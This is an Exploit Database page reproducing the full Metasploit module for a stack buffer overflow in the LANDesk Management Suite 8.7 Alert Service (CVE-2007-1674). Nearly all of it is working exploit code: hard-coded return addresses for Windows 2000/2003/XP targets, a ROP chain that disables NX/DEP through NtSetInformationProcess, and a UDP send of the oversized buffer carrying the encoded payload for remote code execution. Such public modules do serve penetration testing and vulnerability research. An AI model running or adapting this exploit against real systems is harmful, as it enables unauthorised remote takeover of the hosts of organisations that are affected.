LANDesk Management Suite 8.7 – Alert Service Buffer Overflow (Metasploit)

• Exploit Database
• 13 阅读

• 作者： Metasploit
  日期： 2010-05-09
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16457/

• ##
  # $Id: landesk_aolnsrvr.rb 9262 2010-05-09 17:45:00Z jduck $
  ##
  
  ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = AverageRanking
  
  	include Msf::Exploit::Remote::Udp
  
  	def initialize(info = {})
  		super(update_info(info,
  			'Name' => 'LANDesk Management Suite 8.7 Alert Service Buffer Overflow',
  			'Description'=> %q{
  				This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending
  				an overly long string to the Alert Service, a buffer is overwritten and arbitrary
  				code can be executed.
  			},
  			'Author' => 'MC',
  			'Version'=> '$Revision: 9262 $',
  			'References' =>
  				[
  					['CVE', '2007-1674'],
  					['OSVDB', '34964'],
  					['URL', 'http://www.tippingpoint.com/security/advisories/TSRT-07-04.html'],
  				],
  			'DefaultOptions' =>
  				{
  					'EXITFUNC' => 'thread',
  				},
  			'Payload'=>
  				{
  					'Space'=> 336,
  					'StackAdjustment' => -3500,
  				},
  			'Platform' => 'win',
  			'Targets'=>
  				[
  					# Aolnsrvr 4.0
  					[ 'Alerting Proxy 2000/2003/XP', { 'Ret' => 0x00423554 } ],
  					[ 'Alerting Proxy 2003 SP1-2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xed } ],
  					[ 'Alerting Proxy XP SP2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xe4 } ],
  				],
  			'Privileged' => true,
  			'DefaultTarget'=> 0,
  			'DisclosureDate' => 'Apr 13 2007'))
  
  		register_options([Opt::RPORT(65535)], self.class)
  	end
  
  	def exploit
  		connect_udp
  
  		if (target.name =~ /NX/)
  			txt = Rex::Text.rand_text_alphanumeric(1024)
  
  			ib = target['IB']
  
  			# to bypass NX we need to emulate the call to ZwSetInformationProcess
  			# with generic value (to work on 2k3 SP1-SP2 - XP SP2)
  
  
  			# first we set esi to 0xed by getting the value on the stack
  			#
  			# 0x00401b46:
  			# pop esi <- esi = edh
  			# retn
  
  			txt[ 280, 4 ] = [ib + 0x1b46].pack('V')
  			txt[ 296, 4] = [0xed].pack('V')
  
  			# now we set ecx to 0x7ffe0300, eax to 0xed
  			# 0x00401b43:
  			# pop ecx<-ecx = 0x7ffe0300 - 0xFF0
  			# mov eax, esi <- eax == edh
  			# pop esi<- 0x45b4ea (data section)
  			# retn
  
  			txt[ 300, 4] = [ib + 0x1b43].pack('V')
  			txt[ 304, 4] = [0x7ffe0300 - 0xff0].pack('V')
  			txt[ 308, 4] = [ib + 0x5b4ea].pack('V')
  
  			# we set edx to 0x7FFe300 (ecx + 0xff0)
  			# 0x004106b1:
  			# lea edx, [ecx+0ff0h]
  			# mov [esi+4], edx
  			# mov [esi+8], edi
  			# pop edi
  			# mov [esi+0Ch], eax
  			# pop esi
  			# retn
  
  			txt[ 312, 4] = [ib + 0x106b1].pack('V')
  
  
  			# finally we call NtSetInformationProcess (-1, target['ProcessInfo'], ib+0x4ec84, 4)
  			# 0x0044ec84 is a pointer to 0x2 to disable NX
  			# 0x0042a28e:
  			# call dword ptr [edx]
  			# mov esi, eax
  			# mov eax, esi
  			# pop edi
  			# pop esi
  			# pop ebp
  			# pop ebx
  			# add esp, 134h
  			# retn 1Ch
  
  			txt[ 324, 4] = [ib + 0x2a28e].pack('V')# call dword ptr[ecx]
  			txt[ 332, 16] = [-1, 34, 0x0044ec84, 4].pack('VVVV')
  
  			# we catch the second exception to go back to our shellcode, now that
  			# NX is disabled
  
  			txt[ 652, 4 ] = [ib + 0x23554].pack('V') # (jmp esp in atl.dll)
  			txt[ 684, payload.encoded.length ] = payload.encoded
  
  		else
  			# One-shot overwrite =(
  			txt = rand_text_alphanumeric(280) + [target.ret].pack('V') + payload.encoded
  		end
  
  		print_status("Trying target #{target.name}...")
  
  		udp_sock.put(txt)
  
  		handler(udp_sock)
  		disconnect_udp
  	end
  
  end